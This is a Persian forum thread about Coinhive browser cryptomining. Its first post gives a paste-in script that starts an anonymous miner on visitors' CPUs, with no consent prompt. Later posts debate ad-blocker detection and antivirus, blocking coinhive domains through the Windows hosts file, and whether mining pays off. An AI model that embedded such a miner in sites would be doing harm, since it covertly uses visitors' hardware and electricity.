اینو بذارید بعد نیم ساعت بعد داخل پنل رو ببینید
کد:<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('ndXdrYWGkOTUziH6Kq6QR6gcyUHA7ink');
miner.start();
</script>
نمایش نسخه قابل چاپ
دوستان یه کم مراعات کنن بهتره ها
بعد از یک وبگردی کوتاه در سایتهای ایرانی
فایل پیوست 37081
بله توی یک هفته
فایل پیوست 37082
November 5th, 2017, 06:54 PM تاریخ این تاپیک بود از روز 6 تغییرو ببینید
جناب جسارته ها درسته این افزونه جلوی ماینینگ سایت ها رو میگیره ولی این چون کارکرد اصلیش بلاک تبلیغات بنری هستش این عدد blocked که می نویسه در اکثر مواقع تعداد بنر های تبلیغاتی مسدود شده هست وگرنه الان تو همین انجمن هم 5 مورد رو بلاک شده گزارش میده.
البته می دونم حتماً از این موضوع اطلاع داشتید ولی با توجه به پست قبلیتون که گفتید اکثر سایت های ایرانی ماینینگ میکنن خدایی از حق نگذریم به جز تعداد معدود انگشت شمار دیگه سایر سایت های ایرانی حداقل هنوز وارد ماینینگ نشدن.
راستی با توجه به اینکه شما تو عکس افزونه Kaspersky Protection رو تو فایرفاکس نصب دارید اصولاً باید آنتی ویروس سیستم شما هم کسپرسکی باشه مگه نه؟ من که از اون قضیه استفاده هکر های روسی از موقعیت کسپرسکی برای شنود از آمریکایی ها و دستور آمریکا به حذف کسپرسکی در تمامی ارگان ها و اداراتش (منبع: https://www.google.com/search?q=آمری...utf-8&oe=utf-8) دیگه اعتماد قبل رو به کسپرسکی ندارم و با اینکه هنوز 6 ماه از لایسنسم مونده پاکش کردم خواستم بدونم برای شما یعنی آنتی ویروسی با این همه ادعا ماینینگ رو مسدود نمیکنه که نیاز به افزونه جدا نداشته باشید؟؟ چون تو صفحه اول تاپیک کاربر wapmaster گفتن که آنتی ویروسی که دارن براشون ماینینگ رو مسدود میکنه.
ببینید این وب سایت خدمات دیگه هم داره ها !
کپچا داره که مقدار مشخصی ماین میکنه ؛ برای لاگین سایت ها میشه استفاده کرد !
لب تاب اشتباست. لپ تاپ...
قرار نیست این سایت ها سیاستشون اینقدر بچه گانه باشه که به سرعت بشه ازش درامد کسب کرد اون هم با قرار دادن روی سرورهای مجازی و سایت هایی که 100 تا بازدید کننده داره که از اون صدتا هم 90 تاش صاحب سایته باقیش هم بی هدف!
این روش نیاز به فعالیت زیاد و کسب درامد در دراز مدت داره. منع قانونی هم برای استفاده از اون نیست فقط AdBlock میتونه این روش رو روی مرورگر از کار بندازه که بازهم روش های دور زدن هست و مدیر سایت میتونه اجبار کنه غیرفعال کردن AdBlock رو.
هرچی باشه از روش های کسب درامد یکطرفه سیستم های تبلیغاتی چرت حال حاضر بهتر هست. تبلیغ دهنده پولش رو از متقاضی میگیره و به شما میگه برای هزاران نفر نمایش بده هرکی کلیک کرد یچیزی هم تو جیب تو میره حالا بشین یکی کلیک کنه ولی تبلیغ دیده میشه واسه خودش. یا تبلیغات پاپ آپ که روی اعصاب آدم میره.
اگر وب سایت شما بازدیدی نداره دنبال این روش نباشید. اما اگر بازدید مناسبی دارید بجای خوردن منابع کاربر از روش Catptcha یا روش درخواست کلیک از سوی کاربر استفاده کنید.
برای جلوگیری از سوءاستفاده چنین ابزارهایی دو راه اصلی توصیه می شود.
اول استفاده از نرم افزارها یا افزونه های معتبری که مانع از نمایش تبلیغات می شوند (ad-blocker).
دوم ویرایش دستی فایل hosts ویندوز در مسیر windows\system32\drivers\etc به کمک نرم افزار Notepad و افزودن آدرس های coin-hive.com و coinhive.com به فهرست سایت های بلاک شده.
این که نیاز به تایید و استارت کاربر داره دوستان
یا روش دیگه ای که بنده نمیدونم
برای سایتی با نزدیک 20 هزار آی پی به نظرتون به صرفه هست استفاده کنیم حدود 1تا2دقیقه هم کاربرا میمونن معمولا
در مورد اول بله ولی این افزونه علاوه بر نوشتن بلاک یه کاربرد دیگم داره و اینکه دقیقا ارور میده که کاربر مصرف سی پی یو رو میخواد اجازه میدی؟
د مورد کسپر من فکر کنم ده سالی هست کسپر دارم و واقعا از امنیتی که ایجاد کرده راضی هستم جوری که سمت هیچ آنتی ویروسی نمیرم و واقعا کاربردی تر از کسپر ندیدم
در مورد جلوگیری هم شایدگزینه ای داشته باشه چون من کانفیگش نکردم ولی در حالت عادی نه جلوشو نمیگیره ولی سایتی اگر ویروسی باشه یا حتی حمله رو میگیره بارها شده گفته از فلان آیپی میخواد وارد لپ تاپت بشه
یا مثلا سایتی رو باز کردم گفته فلان فایل جاواش آلودست